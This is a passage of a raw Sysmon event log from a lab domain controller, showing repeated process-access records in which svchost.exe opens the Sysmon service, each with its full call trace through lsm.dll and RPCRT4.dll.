09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053468Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053467Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053466Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053465Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053464Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053463Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053462Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053461Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053460Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053459Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053458Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053457Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053456Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053455Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053454Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053453Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053452Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053451Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053450Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053449Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053448Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053447Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053446Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053445Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 